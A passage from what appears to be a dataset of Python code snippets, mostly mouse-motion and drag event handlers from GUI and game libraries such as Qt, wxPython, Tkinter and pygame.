new_cursor_position.x() - old_cursor_position.x()\n offset_y = new_cursor_position.y() - old_cursor_position.y()\n if self.move_all is False:\n \"\"\"Update single disk\"\"\"\n old_top_left_corner = self.scenePos()\n new_top_left_corner_x = offset_x + old_top_left_corner.x()\n new_top_left_corner_y = offset_y + old_top_left_corner.y()\n self.setPos(QPointF(new_top_left_corner_x, new_top_left_corner_y)) # update disk top left corner\n else:\n \"\"\"Call parent to update everybody\"\"\"\n self.parentItem().move_everybody(offset_x, offset_y)", "def mouseMoveEvent(self, event):\n self.end = event.pos()\n self.update()", "def update(self):\n # Get the current mouse position. 
This returns the position\n # as a list of two numbers.\n pos = pygame.mouse.get_pos()\n\n # Set the player x position to the mouse x position\n self.rect.x = pos[0]", "def on_mouse_motion(self, x, y, delta_x, delta_y):\n \n pass", "def update(self):\n # Get the current mouse position. This returns the position\n # as a list of two numbers.\n pos = pygame.mouse.get_pos()\n \n # Set the player x position to the mouse x position\n self.rect.x = pos[0]", "def mousePosition(self):", "def OnMouseMotion(self, evt):\n if evt.Dragging() and evt.LeftIsDown():\n self.lastx, self.lasty = self.x, self.y\n self.x, self.y = evt.GetPosition()\n self.Refresh(False)", "def _motion(self, event):\n if self.current:\n # modify the current line by changing the end coordinates\n # to be the current mouse position\n coords = event.widget.coords(self.current)\n coords[2] = event.x\n coords[3] = event.y\n\n event.widget.coords(self.current, *coords)", "def mouseMoveEvent(self, event):\n # super(PlotWidget, self).mouseMoveEvent(event)\n event.accept()", "def mouseMoveEvent(self, event):\r\n start = QtCore.QPointF(self.mapToScene(self._start))\r\n end = QtCore.QPointF(self.mapToScene(event.pos())) \r\n \r\n w = abs((end.x() - start.x()))\r\n h = abs((end.y() - start.y())) \r\n \r\n x = (start.x() + end.x())/2\r\n y = (start.y() + end.y())/2 \r\n \r\n lcx = x - (w/2)\r\n lcy = y - (h/2) \r\n \r\n if self.editRegen:\r\n self._currentBox.setRect(lcx,lcy,w,h)\r\n self.updateSceneDataInCamraSpace()\r\n \r\n if self.itemMovable:\r\n self.updateSceneDataInCamraSpace()\r\n \r\n super(MocapGraphicsView, self).mouseMoveEvent(event)", "def ev_windowmoved(self, event: WindowMoved) -> None:", "def mouseMoveEvent (self, event):\n self.itemMoved = True\n super(DiagramItem, self).mouseMoveEvent(event)", "def _updateOnMouseState(self, state):\n x = state.X.abs\n y = state.Y.abs\n \n mscale = self.mouse_icon.getScale() \n \n if (x + mscale[0] + self.mouse_offset) > render_engine.Window.width:\n x = x - mscale[0] - 10\n else:\n x += self.mouse_offset\n \n if (y + mscale[1] + self.mouse_offset) > render_engine.Window.height:\n y = y - mscale[1] - 10\n else:\n y += self.mouse_offset\n \n self.mouse_icon.setPosition((x, y))", "def onMove(self, event):\n\n # get current mouse position\n (x, y) = event.GetPositionTuple()\n\n self.handleMousePositionCallback((x, y))\n\n if event.Dragging() and event.LeftIsDown():\n # are we doing box select?\n if self.is_box_select:\n # set select box point 2 at mouse position\n (self.sbox_w, self.sbox_h) = (x - self.sbox_1_x,\n y - self.sbox_1_y)\n elif not self.last_drag_x is None:\n # no, just a map drag\n self.was_dragging = True\n dx = self.last_drag_x - x\n dy = self.last_drag_y - y\n\n # move the map in the view\n self.view_offset_x += dx\n self.view_offset_y += dy\n\n # limit drag at edges of map\n if self.map_width > self.view_width:\n # if map > view, don't allow edge to show background\n if self.view_offset_x < 0:\n self.view_offset_x = 0\n elif self.view_offset_x > self.max_x_offset:\n self.view_offset_x = self.max_x_offset\n else:\n # else map < view, centre X\n self.view_offset_x = (self.map_width - self.view_width)/2\n\n if self.map_height > self.view_height:\n # if map > view, don't allow edge to show background\n if self.view_offset_y < 0:\n self.view_offset_y = 0\n elif self.view_offset_y > self.max_y_offset:\n self.view_offset_y = self.max_y_offset\n else:\n # else map < view, centre Y\n self.view_offset_y = (self.map_height - self.view_height)/2\n\n # adjust remembered X,Y\n 
self.last_drag_x = x\n self.last_drag_y = y\n\n self.recalc_view_lonlat_limits()\n\n # redraw client area\n self.drawTilesLayers()", "def _on_canvas_mouse(self, event):\n if event.GetEventType() in [wx.wxEVT_MOTION, wx.wxEVT_LEFT_DOWN, \n wx.wxEVT_LEFT_UP, wx.wxEVT_MOTION|wx.wxEVT_LEFT_DOWN]:\n new_event = wx.MouseEvent(event.GetEventType())\n pos = self.tc.ScreenToClient(wx.GetMousePosition())\n new_event.SetPosition(pos)\n new_event.Skip()\n self.tc.GetEventHandler().ProcessEvent(new_event)", "def mouseMoveEvent(self, e):\r\n \r\n self.label.setText('mouseMoveEvent')", "def OnMouse(self, event):\n\n self.Refresh()\n event.Skip()", "def setupEventHooks(self):\n # handle mouse clicks\n self.img.scene().sigMouseClicked.connect(self.handleClick)\n # handle mouse movement\n # Use signalproxy for ratelimiting\n sig = self.img.scene().sigMouseMoved\n self.mvProxy = pqg.SignalProxy(signal=sig, rateLimit=60, slot=self.handleMove)", "def handle_event(self, event):\n if event.type != MOUSEMOTION:\n return\n self.model.slider.left = event.pos[0]", "def movement(self):", "def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.set_selected(self.mouse_on_grid())\n if self.get_selected() is not None and event.type == pygame.KEYDOWN:\n self.event_seletect_moved(event)\n self.event_cell_update(event)", "def on_mouse_move(self, event):\n\n # self.view = 1 * np.eye(4, dtype=np.float32)\n # self.model = 1 * np.eye(4, dtype=np.float32)\n\n # self.translate -= event.delta[1]\n # self.translate = max(-1, self.translate)\n # print(event.delta[1])\n # print(self.translate)\n # self.view = translate((0, 0, -self.translate))\n # self.game_program['u_view'] = self.view\n # self.game_program['u_size'] = 5 / self.translate\n # self.view = (0.1*self.translate*np.eye(4, dtype=np.float32)) + self.view\n # self.model = (0.1*self.translate*np.eye(4, dtype=np.float32)) + self.model\n # print(self.view)\n\n # self.game_program['u_model'] = self.model\n # self.game_program['u_view'] = self.view\n\n x, y = event.pos\n #print(x, y)\n self.x_offset, self.y_offset = x - self.last_x, - (y - self.last_y)\n self.last_x, self.last_y = x, y\n self.x_offset *= self.sensitivity\n self.y_offset *= self.sensitivity\n\n self.yaw, self.pitch = self.yaw - self.x_offset, self.pitch + self.y_offset\n self.rot_y(self.yaw * np.pi / 180)\n self.rot_x(self.pitch * np.pi / 180)\n\n self.view = np.dot(self.rot_mat_y, self.rot_mat_x)\n self.game_program['u_view'] = self.view\n\n self.update()", "def OnMoveEvent(self, event):\r\n\r\n win_rect = self.GetRect()\r\n\r\n if win_rect == self._last_rect:\r\n return\r\n\r\n # skip the first move event\r\n if self._last_rect.IsEmpty(): \r\n self._last_rect = wx.Rect(*win_rect)\r\n return\r\n \r\n # skip if moving too fast to avoid massive redraws and\r\n # jumping hint windows\r\n if abs(win_rect.x - self._last_rect.x) > 3 or abs(win_rect.y - self._last_rect.y) > 3:\r\n self._last3_rect = wx.Rect(*self._last2_rect)\r\n self._last2_rect = wx.Rect(*self._last_rect)\r\n self._last_rect = wx.Rect(*win_rect)\r\n return\r\n\r\n # prevent frame redocking during resize\r\n if self._last_rect.GetSize() != win_rect.GetSize():\r\n self._last3_rect = wx.Rect(*self._last2_rect)\r\n self._last2_rect = wx.Rect(*self._last_rect)\r\n self._last_rect = wx.Rect(*win_rect)\r\n return\r\n\r\n self._last3_rect = wx.Rect(*self._last2_rect)\r\n self._last2_rect = wx.Rect(*self._last_rect)\r\n self._last_rect = 
wx.Rect(*win_rect)\r\n\r\n if _VERSION_STRING < \"2.9\":\r\n leftDown = wx.GetMouseState().LeftDown()\r\n else:\r\n leftDown = wx.GetMouseState().LeftIsDown()\r\n\r\n if not leftDown:\r\n return\r\n\r\n if not self._moving: \r\n self.OnMoveStart(event)\r\n self._moving = True\r\n\r\n if self._last3_rect.IsEmpty():\r\n return\r\n\r\n self.OnMoving(event)", "def move( self, event ):\n self.lastMotion = time()\n if self.follow == False: # If the follow flag is not set, motion within the widget will make the ToolTip dissapear\n self.withdraw()\n self.visible = 1\n self.geometry( '+%i+%i' % ( event.x_root+10, event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n try:\n self.msgVar.set( self.msgFunc() ) # Try to call the message function. Will not change the message if the message function is None or the message function fails\n except:\n pass\n self.after( int( self.delay * 1000 ), self.show )", "def _on_move(self, event):\n\n if not self.button_pressed:\n return\n\n if self.M is None:\n return\n\n x, y = event.xdata, event.ydata\n # In case the mouse is out of bounds.\n if x == None:\n return\n\n dx, dy = x - self.sx, y - self.sy\n x0, x1 = self.get_xlim()\n y0, y1 = self.get_ylim()\n w = (x1-x0)\n h = (y1-y0)\n self.sx, self.sy = x, y\n\n # Rotation\n if self.button_pressed in self._rotate_btn:\n # rotate viewing point\n # get the x and y pixel coords\n if dx == 0 and dy == 0:\n return\n self.elev = art3d.norm_angle(self.elev - (dy/h)*180)\n self.azim = art3d.norm_angle(self.azim - (dx/w)*180)\n self.get_proj()\n self.figure.canvas.draw()\n\n# elif self.button_pressed == 2:\n # pan view\n # project xv,yv,zv -> xw,yw,zw\n # pan\n# pass\n\n # Zoom\n elif self.button_pressed in self._zoom_btn:\n # zoom view\n # hmmm..this needs some help from clipping....\n minx, maxx, miny, maxy, minz, maxz = self.get_w_lims()\n df = 1-((h - dy)/h)\n dx = (maxx-minx)*df\n dy = (maxy-miny)*df\n dz = (maxz-minz)*df\n self.set_xlim3d(minx - dx, maxx + dx)\n self.set_ylim3d(miny - dy, maxy + dy)\n self.set_zlim3d(minz - dz, maxz + dz)\n self.get_proj()\n self.figure.canvas.draw()", "def update(self):\r\n # Get where the mouse is\r\n pos = pygame.mouse.get_pos()\r\n # Set the left side of the player bar to the mouse position\r\n self.rect.x = pos[0]\r\n # Make sure we don't push the player paddle\r\n # off the right side of the screen\r\n if self.rect.x > self.screenwidth - self.width:\r\n self.rect.x = self.screenwidth - self.width", "def mouse_move(self, obj, event):\n last_pos = self.iren.GetLastEventPosition()\n next_pos = self.iren.GetEventPosition()\n last_disp_coords = np.asarray([last_pos[0], last_pos[1], 0])\n next_disp_coords = np.asarray([next_pos[0], next_pos[1], 0])\n last_world_coords = self.display_to_world(last_disp_coords)\n next_world_coords = self.display_to_world(next_disp_coords)\n world_direction = (last_world_coords - next_world_coords)[0]\n\n if world_direction > 0:\n direction = 'forwards'\n elif world_direction < 0:\n direction = 'backwards'\n else:\n direction = 'none'\n\n if self.cone_dir == 'start':\n if direction == 'backwards':\n self.start_base_x += .5\n if self.start_base_x.is_integer():\n ind = str(int(self.start_base_x))\n isvalid = self.gaps.set_dragged_start(ind)\n if isvalid:\n self.ren_win.Render()\n else:\n self.start_base_x -= .5\n return\n\n elif direction == 'forwards':\n if self.start_base_x > 0:\n self.start_base_x -= .5\n if self.start_base_x.is_integer():\n ind = str(int(self.start_base_x))\n self.gaps.set_dragged_start(ind)\n 
self.ren_win.Render()\n\n if self.cone_dir == 'end':\n if direction == 'backwards':\n if self.end_base_x > 0:\n self.end_base_x -= .5\n if self.end_base_x.is_integer():\n ind = str(int(self.end_base_x))\n self.gaps.set_dragged_end(ind)\n self.ren_win.Render()\n\n elif direction == 'forwards':\n self.end_base_x += .5\n if self.end_base_x.is_integer():\n ind = str(int(self.end_base_x))\n isvalid = self.gaps.set_dragged_end(ind)\n if isvalid:\n self.ren_win.Render()\n else:\n self.end_base_x -= .5\n return", "def move(self, event):\r\n self.lastMotion = time()\r\n # If the follow flag is not set, motion within the\r\n # widget will make the ToolTip disappear\r\n #\r\n if self.follow is False:\r\n self.withdraw()\r\n self.visible = 1\r\n\r\n # Offset the ToolTip 10x10 pixes southwest of the pointer\r\n self.geometry('+%i+%i' % (event.x_root+20, event.y_root-10))\r\n try:\r\n # Try to call the message function. Will not change\r\n # the message if the message function is None or\r\n # the message function fails\r\n self.msgVar.set(self.msgFunc())\r\n except:\r\n pass\r\n self.after(int(self.delay * 1000), self.show)", "def move(self, event):\r\n self.lastMotion = time()\r\n # If the follow flag is not set, motion within the\r\n # widget will make the ToolTip disappear\r\n #\r\n if self.follow is False:\r\n self.withdraw()\r\n self.visible = 1\r\n\r\n # Offset the ToolTip 10x10 pixes southwest of the pointer\r\n self.geometry('+%i+%i' % (event.x_root+20, event.y_root-10))\r\n try:\r\n # Try to call the message function. Will not change\r\n # the message if the message function is None or\r\n # the message function fails\r\n self.msgVar.set(self.msgFunc())\r\n except:\r\n pass\r\n self.after(int(self.delay * 1000), self.show)", "def move(self, event):\n self.lastMotion = time()\n # If the follow flag is not set, motion within the\n # widget will make the ToolTip disappear\n #\n if self.follow is False:\n self.withdraw()\n self.visible = 1\n\n # Offset the ToolTip 10x10 pixes southwest of the pointer\n self.geometry('+%i+%i' % (event.x_root+20, event.y_root-10))\n try:\n # Try to call the message function. 
Will not change\n # the message if the message function is None or\n # the message function fails\n self.msgVar.set(self.msgFunc())\n except:\n pass\n self.after(int(self.delay * 1000), self.show)", "def mouseMoveEvent(self, event):\n if self._ignore_mouse_events:\n event.ignore()\n return\n\n event.accept()\n\n if self._selection_mode != SelectionMode.NONE:\n x = event.x()\n y = event.y()\n xdiff = float(x - self._selection_position_start[0])\n ydiff = float(y - self._selection_position_start[1])\n if abs(xdiff) < 0.0001:\n xdiff = 1\n if abs(ydiff) < 0.0001:\n ydiff = 1\n xoff = float(self._selection_position_start[0]) / xdiff + 0.5\n yoff = float(self._selection_position_start[1]) / ydiff + 0.5\n self._addUpdateSelectionBox(xdiff, ydiff, xoff, yoff)\n\n elif self._use_zinc_mouse_event_handling:\n scene_input = self._sceneviewer.createSceneviewerinput()\n scene_input.setPosition(event.x(), event.y())\n scene_input.setEventType(Sceneviewerinput.EVENT_TYPE_MOTION_NOTIFY)\n if event.type() == QtCore.QEvent.Leave:\n scene_input.setPosition(-1, -1)\n self._sceneviewer.processSceneviewerinput(scene_input)", "def mouse_position_event(self, x: int, y: int):\n pass", "def mousePressEvent(self, event):\n self.begin = event.pos()\n self.end = event.pos()\n self.update()", "def handle_mouse(self, x, y):\n pass", "def handle_mouse_press(self, event):", "def update(self):\n # Get where the mouse is\n pos = pygame.mouse.get_pos()\n # Set the left side of the player bar to the mouse position\n self.rect.x = pos[0]\n # Make sure we don't push the player paddle \n # off the right side of the screen\n if self.rect.x > self.screenwidth - self.width:\n self.rect.x = self.screenwidth - self.width", "def mouseMoveEvent(self, evnt):\n # if mouse button is down check if you want to move nodes\n if not evnt.buttons() == QtCore.Qt.LeftButton:\n return\n if self.mode != self.MODE_SELECT:\n return\n dx = evnt.scenePos().x() - self.pressX\n dy = evnt.scenePos().y() - self.pressY\n for i, node in enumerate(self.selectedNodes):\n x = self.ipos[i][0] + dx\n y = self.ipos[i][1] + dy\n x, y = self.nearestGrid(x, y) # snap to minor grids\n self.p.dat.flowsheet.nodes[node].x = x\n self.p.dat.flowsheet.nodes[node].y = y\n self.p.createScene()\n self.p.updateFSPos.emit() # update the flowsheet and node editor", "def process_IN_MOVE_SELF(self, event):", "def update(self):\n pos = pygame.mouse.get_pos()\n self.rect.midtop = pos\n if self.punching:\n self.rect.move_ip(5, 10)", "def mouseMoveEvent(self, event):\n if self.mousenode is not None:\n self.mousenode.setPos(event.scenePos())\n return QtGui.QGraphicsScene.mouseMoveEvent(self, event)", "def update(self):\n pos = pygame.mouse.get_pos()\n self.rect.midtop = pos\n if self.punching:\n self.rect.move_ip(5, 10) # move fist position in place", "def mouseMoveEvent(self, event: QMouseEvent):\n if self._moving:\n # If _moving is set from mousePressEvent , change geometry\n self.prepareGeometryChange()\n\n pos = event.pos().toPoint()\n\n if pos.x() >= self._origin.x():\n self._rect.setRight(pos.x())\n else:\n self._rect.setLeft(pos.x())\n\n if pos.y() >= self._origin.y():\n self._rect.setBottom(pos.y())\n else:\n self._rect.setTop(pos.y())\n self._rect = self._rect.normalized()\n self.update()\n return\n else:\n super().mouseMoveEvent(event)", "def mouseMoveEvent(self, event):\n if self.line:\n self.line.setLine(QLineF(self.line.line().p1(), event.scenePos()))\n\n QGraphicsScene.mouseMoveEvent(self, event)\n self.update()", "def update(self):\n\n\t\tself.x = 
games.mouse.x\n\t\tself.y = games.mouse.y\n\t\tself.check_collide()", "def onMove(self,event=None):\n if self.app.DEBUG:\n print 'Event: Parent: %s.onMove'%self.__class__\n if self.redraw:self.redraw()", "def update(self):\n self.x = games.mouse.x\n #self.y = games.mouse.y\n self.check_collide()", "def update(self):\r\n self.x = games.mouse.x\r\n self.y = games.mouse.y\r\n self.check_collide()", "def ev_MOUSEUP(self, event):", "def mouseDragged(self, point, delta):\n pass", "def update(self):\n self.x = games.mouse.x\n self.y = games.mouse.y\n self.check_collide()", "def handleMove(self):\n pass", "def handle_pygame_event(self, event):\n if event.type != MOUSEMOTION:\n # nothing to do\n return\n self.model.paddle.x = event.pos[0]-self.model.paddle.width/2.0", "def mouseMoveEvent(self, e):\n if e.pos().y() == self.offset:\n return\n adder = (self.offset - e.y())\n self.deltacount += adder\n #adder *= self.accelerator\n adder *= (abs(adder) * 0.01)\n #self._state[0] = max(self._min[0], min(self._max[0], self._state[0] + adder))\n QtGui.qApp.emit( QtCore.SIGNAL(\"deltaChanged\"), self, adder)\n #self._param.update()\n QtGui.QCursor.setPos(self.origo)", "def on_mouse_movement(self, event: wx.MouseEvent) -> None:\n if not event.Dragging():\n self._drag_start_pos = None\n return\n # self.CaptureMouse()\n if self._drag_start_pos is None:\n self._drag_start_pos = event.GetPosition()\n else:\n current_pos = event.GetPosition()\n change = self._drag_start_pos - current_pos\n self.SetPosition(self.GetPosition() - change)", "def on_mouse_movement(self, event: wx.MouseEvent) -> None:\n if not event.Dragging():\n self._drag_start_pos = None\n return\n # self.CaptureMouse()\n if self._drag_start_pos is None:\n self._drag_start_pos = event.GetPosition()\n else:\n current_pos = event.GetPosition()\n change = self._drag_start_pos - current_pos\n self.SetPosition(self.GetPosition() - change)", "def move_move(self, event):\n self.canvas.scan_dragto(event.x, event.y, gain=1)", "def onMove(self, event):\n\t\tif (event.xdata != None and event.ydata != None and event.xdata != self.xdata and event.ydata != self.ydata):\n\n\t\t\tself.xdata = event.xdata\n\t\t\tself.ydata = event.ydata\n\n\t\t\tfor loop in range(4):\n\t\t\t\tself.stokesFig.canvas.restore_region(self.background[loop])\n\t\t\t\tself.obsStokes[loop].set_ydata(self.stokes[loop][event.ydata, event.xdata, :])\n\t\t\t\tself.axStokes[loop].draw_artist(self.obsStokes[loop])\n\t\t\t\tself.axStokes[loop].draw_artist(self.axStokes[loop].get_yaxis())\n\t\t\t\tself.stokesFig.canvas.blit(self.axStokes[loop].bbox.expanded(1.4, 1.1))", "def moveEvent(self, *args, **kwargs):\n self.windowMoved.emit()", "def OnIdle(self, event):\r\n\r\n if self._moving: \r\n if _VERSION_STRING < \"2.9\":\r\n leftDown = wx.GetMouseState().LeftDown()\r\n else:\r\n leftDown = wx.GetMouseState().LeftIsDown()\r\n\r\n if not leftDown:\r\n self._moving = False\r\n self.OnMoveFinished()\r\n else: \r\n event.RequestMore()", "def move( self, event ):\n self.lastMotion = time()\n if self.follow == False: # If the follow flag is not set, motion within the widget will make the ToolTip dissapear\n self.withdraw()\n self.visible = 1\n\n root = self.parent\n root = self.parent\n\n # parent_name = self.winfo_parent()\n # root = self._nametowidget(parent_name)\n\n \n # pa = re.split(r'(\\D)', root.geometry())\n # pt = re.split(r'(\\D)', self.geometry())\n #pm = re.split(r'(\\D)', self.master.geometry())\n #print \"root: \", pa\n #print \"tool: \", self.geometry()\n #print \"pm: \", 
self.wdgt.geometry()\n #print \"mouse: \", event.x_root, event.y_root\n #print \"mouser: \", event.x, event.y\n \n xCan = event.x_root - self.parent.winfo_rootx()\n yCan = event.y_root - self.parent.winfo_rooty()\n #print \"mouser2: \", xCan, yCan\n \n \n \n #if pa[5] == '-':\n # limit_x = int(pa[0]) - int(pa[6]) \n # print \"minus\"\n #else:\n #limit_x = int(pa[0]) + int(pa[4]) \n #if root.state() == 'zoomed':\n # limit_x = int(pa[0])\n #print \"lim: \", limit_x\n \n self.geometry( '+%i+%i' % ( event.x_root+10, event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n \n # if xCan > (limit_x-int(pt[0])):\n # #print \"xxx\"\n # self.geometry( '+%i+%i' % ( event.x_root-int(pt[0]), event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n # else:\n # self.geometry( '+%i+%i' % ( event.x_root+10, event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n # try:\n # self.msgVar.set( self.msgFunc() ) # Try to call the message function. Will not change the message if the message function is None or the message function fails\n # except:\n # pass\n self.after( int( self.delay * 1000 ), self.show )", "def mouseMoveEvent(self, mouseEvent):\n QGraphicsScene.mouseMoveEvent(self, mouseEvent)\n if not mouseEvent.isAccepted() and mouseEvent.buttons() == Qt.LeftButton:\n delta = mouseEvent.lastScreenPos() - mouseEvent.screenPos()\n self.translate(delta.x(), delta.y())", "def update(self):\n pygame.event.pump()\n self.pos_x -= 1.5", "def mouseDragged():\n if mousePressed:\n mousePressed()", "def mouse_motion_handler(self, event):\r\n\r\n self.reset_button.mouse_motion_handler(event.pos)\r\n\r\n if not self.is_game_over:\r\n tile = self.board.get_event_tile(event.pos)\r\n self.board.update_tile_hover(tile, self.is_left_mouse_down, self.is_right_mouse_down)\r\n self.update_reset_button()", "def onMouseMove(self,mouseEvent):\n\t\tself.canvas.drawEdgeTo(mouseEvent.x,mouseEvent.y)", "def grab(self, event):\n self.ypos = event.y\n self.xpos = event.x\n self.config(cursor='fleur')", "def emitMouseMoveEvent(self, location, currentKbKey, draggedItems, items):\n # emit the mouseMoveEvent signal\n self.mouseMove.emit(self, location, currentKbKey, draggedItems, items)", "def hoverMoveEvent(self, event):\n activeTool = self._activeTool()\n toolMethodName = str(activeTool) + \"HoverMove\"\n if hasattr(self, toolMethodName):\n getattr(self, toolMethodName)(event.pos())", "def callback_handle_left_mouse_motion(self, event):\n\n # TODO: update this for the case where there is no current shape id\n vector_object = self.get_vector_object(self.variables.current_shape_id)\n if self.variables.active_tool == TOOLS.PAN_TOOL:\n x_dist = event.x - self.variables.tmp_anchor_point[0]\n y_dist = event.y - self.variables.tmp_anchor_point[1]\n self.move(self.variables.image_id, x_dist, y_dist)\n self.variables.tmp_anchor_point = event.x, event.y\n elif self.variables.active_tool == TOOLS.TRANSLATE_SHAPE_TOOL:\n x_dist = event.x - self.variables.tmp_anchor_point[0]\n y_dist = event.y - self.variables.tmp_anchor_point[1]\n t_coords = self.get_shape_canvas_coords(self.variables.current_shape_id)\n new_coords = numpy.asarray(t_coords) + x_dist\n new_coords_y = numpy.asarray(t_coords) + y_dist\n new_coords[1::2] = new_coords_y[1::2]\n if vector_object.image_drag_limits:\n canvas_limits = self.image_coords_to_canvas_coords(vector_object.image_drag_limits)\n x_vertices = new_coords[0::2]\n y_vertices = new_coords[1::2]\n within_x_limits = True\n within_y_limits = True\n for 
x_vertex in x_vertices:\n if canvas_limits[2] < x_vertex or x_vertex < canvas_limits[0]:\n within_x_limits = False\n for y_vertex in y_vertices:\n if y_vertex < canvas_limits[1] or y_vertex > canvas_limits[3]:\n within_y_limits = False\n if not within_x_limits:\n new_coords[0::2] = t_coords[0::2]\n if not within_y_limits:\n new_coords[1::2] = t_coords[1::2]\n self.modify_existing_shape_using_canvas_coords(self.variables.current_shape_id,\n new_coords,\n update_pixel_coords=True)\n self.variables.tmp_anchor_point = event.x, event.y\n elif self.variables.active_tool == TOOLS.EDIT_SHAPE_COORDS_TOOL:\n previous_coords = self.get_shape_canvas_coords(self.variables.current_shape_id)\n coord_x_index = self.variables.tmp_closest_coord_index*2\n coord_y_index = coord_x_index + 1\n new_coords = list(previous_coords)\n new_coords[coord_x_index] = event.x\n new_coords[coord_y_index] = event.y\n if vector_object.image_drag_limits:\n drag_x_lim_1, drag_y_lim_1, drag_x_lim_2, drag_y_lim_2 = \\\n self.image_coords_to_canvas_coords(vector_object.image_drag_limits)\n if new_coords[coord_x_index] < drag_x_lim_1:\n new_coords[coord_x_index] = drag_x_lim_1\n if new_coords[coord_x_index] > drag_x_lim_2:\n new_coords[coord_x_index] = drag_x_lim_2\n if new_coords[coord_y_index] < drag_y_lim_1:\n new_coords[coord_y_index] = drag_y_lim_1\n if new_coords[coord_y_index] > drag_y_lim_2:\n new_coords[coord_y_index] = drag_y_lim_2\n\n self.modify_existing_shape_using_canvas_coords(self.variables.current_shape_id, tuple(new_coords))\n elif self.variables.active_tool == TOOLS.ZOOM_IN_TOOL:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.ZOOM_OUT_TOOL:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.SELECT_TOOL:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_RECT_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_ELLIPSE_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_LINE_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_ARROW_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_POINT_BY_CLICKING:\n self.modify_existing_shape_using_canvas_coords(self.variables.current_shape_id, (event.x, event.y))", "def __handleMouseEvents(self, event):\n if not self.enabled:\n return\n\n x, y = event.GetPosition()\n\n # First make sure we have started a box.\n if self.currentBox == None and not event.LeftDown():\n # No box started yet. Set cursor to the initial kind.\n self.__setCursor(wx.CURSOR_CROSS)\n return\n\n if event.LeftDown():\n if self.currentBox == None:\n # No RB Box, so start a new one.\n self.currentBox = (x, y, 0, 0)\n self.hasLetUp = 0\n elif self.__isSizingCursor():\n # Starting a sizing operation. 
Change the origin.\n position = getCursorPosition(x, y, self.currentBox, thickness=self.__THICKNESS)\n self.currentBox = self.__denormalizeBox(position, self.currentBox)\n\n elif event.Dragging() and event.LeftIsDown():\n # Use the cursor type to determine operation\n if self.__isMovingCursor():\n if self.currentlyMoving or pointInBox(x, y, self.currentBox):\n if not self.currentlyMoving:\n self.currentlyMoving = (x - self.currentBox[0], y - self.currentBox[1])\n self.__moveTo(x - self.currentlyMoving[0], y - self.currentlyMoving[1])\n elif self.__isSizingCursor():\n self.__resizeBox(x, y)\n\n elif event.LeftUp():\n self.hasLetUp = 1\n self.currentlyMoving = None\n self.__normalizeBox()\n\n elif event.Moving() and not event.Dragging():\n # Simple mouse movement event\n self.__mouseMoved(x,y)", "def on_mouse_motion(self, x, y, delta_x, delta_y):\n\n print(x)\n print(y)\n print(delta_x)\n print(delta_y)\n\n\n #self.manage_crosshair()\n \n \n\n #self.crosshair_sprite.center_x += delta_x\n #self.crosshair_sprite.center_y += delta_y\n\n\n self.crosshair_relative_xoffset += delta_x\n self.crosshair_relative_yoffset += delta_y", "def OnMoving(self, event):\r\n\r\n # notify the owner manager that the pane is moving\r\n self.OnMoveStart(event)", "def handle_events(self) -> None:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEMOTION:\n self.mouse_pos = event.pos\n elif event.type == MOUSEBUTTONDOWN:\n self.mouse_pos = event.pos\n self.mouse_clicked = True\n elif self._focused_button is not None and event.type == KEYDOWN:\n self._handle_key_press(event)", "def _onMotionNotify(self, widget, event):\n\t\tif self.fullscreenToggle:\n\t\t\tmove = [event.x - self.mouseStart[0], event.y - self.mouseStart[1]]\n\t\t\tnewPos = [self.imgPosStart[0] - move[0], self.imgPosStart[1] - move[1]]\n\t\t\tself.moveImage(newPos[0], newPos[1])", "def normal_mouse_move(self, event):\n plot = self.component\n if plot is not None:\n if isinstance(plot, BaseXYPlot):\n ndx = plot.map_index((event.x, event.y), index_only = True)\n x = plot.index.get_data()[ndx]\n y = plot.value.get_data()[ndx]\n print self.format % (x,y)\n else:\n print \"dataprinter: don't know how to handle plots of type\",\n print plot.__class__.__name__\n return", "def update(self):\n if self.is_moving_up:\n self.dirty = 1\n if self.is_moving_down:\n self.dirty = 1\n if self.is_moving_right:\n self.dirty = 1\n if self.is_moving_left:\n self.dirty = 1\n \n self.rect.x += self.moveX\n self.logic.wall_hit_logic(self.moveX, \"x\", self.room.wall_list)\n self.room_change.change_room()\n \n self.rect.y += self.moveY\n self.logic.wall_hit_logic(self.moveY, \"y\", self.room.wall_list)\n self.room_change.change_room()", "def handleMove(self, pos):\n try:\n pos = pos[0]\n except IndexError:\n return\n\n mappedPos = self.img.mapFromScene(pos)\n xmp = int(mappedPos.x())\n ymp = int(mappedPos.y())\n\n if xmp < 0 or \\\n xmp > self.dat3d.shape[1] - 1 or \\\n ymp < 0 or \\\n ymp > self.dat3d.shape[0] - 1:\n return # discard movement events originating outside the image\n\n # update crosshair\n # self.ch.setPos(xmp, ymp)\n self.ch.curPos = (xmp, ymp)\n self.ch.vline.setPos(xmp)\n self.ch.hline.setPos(ymp)\n\n # update IV plot\n xdata = self.elist\n\n if self.posMask[ymp, xmp]:\n ydata = self.dat3ds[ymp, xmp, :]\n else:\n ydata = smooth(self.dat3d[ymp, xmp, :])\n self.dat3ds[ymp, xmp, :] = ydata\n self.posMask[ymp, xmp] = 1\n pdi = pqg.PlotDataItem(xdata, ydata, pen='r')\n 
